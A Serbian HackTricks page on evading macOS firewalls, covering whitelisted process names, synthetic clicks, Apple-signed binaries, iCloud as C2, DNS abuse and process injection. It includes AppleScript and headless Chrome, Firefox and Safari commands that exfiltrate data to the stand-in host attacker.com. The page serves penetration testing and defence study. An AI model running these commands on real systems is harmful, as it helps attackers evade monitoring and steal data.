4.5 KiB
Bypassovanje macOS Firewall-a
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRIJAVU!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Pronađene tehnike
Navedene tehnike su pronađene da funkcionišu u nekim macOS firewall aplikacijama.
Zloupotreba imena na whitelisti
- Na primer, nazivanje malvera imenima poznatih macOS procesa poput
launchd
Sintetički Klik
- Ako firewall zatraži dozvolu od korisnika, naterajte malver da klikne na dozvolu
Korišćenje Apple potpisanih binarnih fajlova
- Poput
curl
, ali i drugih poputwhois
Dobro poznati Apple domeni
Firewall može dozvoljavati konekcije ka dobro poznatim Apple domenima poput apple.com
ili icloud.com
. iCloud bi mogao biti korišćen kao C2.
Generički Bypass
Neke ideje za pokušaj zaobilaženja firewall-a
Provera dozvoljenog saobraćaja
Znanje o dozvoljenom saobraćaju će vam pomoći da identifikujete potencijalno belistane domene ili koje aplikacije imaju dozvolu da im pristupe
lsof -i TCP -sTCP:ESTABLISHED
Zloupotreba DNS-a
DNS rezolucije se vrše putem mdnsreponder
potpisane aplikacije koja će verovatno biti dozvoljena da kontaktira DNS servere.
Putem aplikacija pregledača
- oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
{% code overflow="wrap" %}
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
{% endcode %}
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
Putem ubacivanja procesa
Ako možete ubaciti kod u proces koji je dozvoljen da se poveže sa bilo kojim serverom, možete zaobići zaštitu firewall-a:
{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}
Reference
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRETPLATU!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.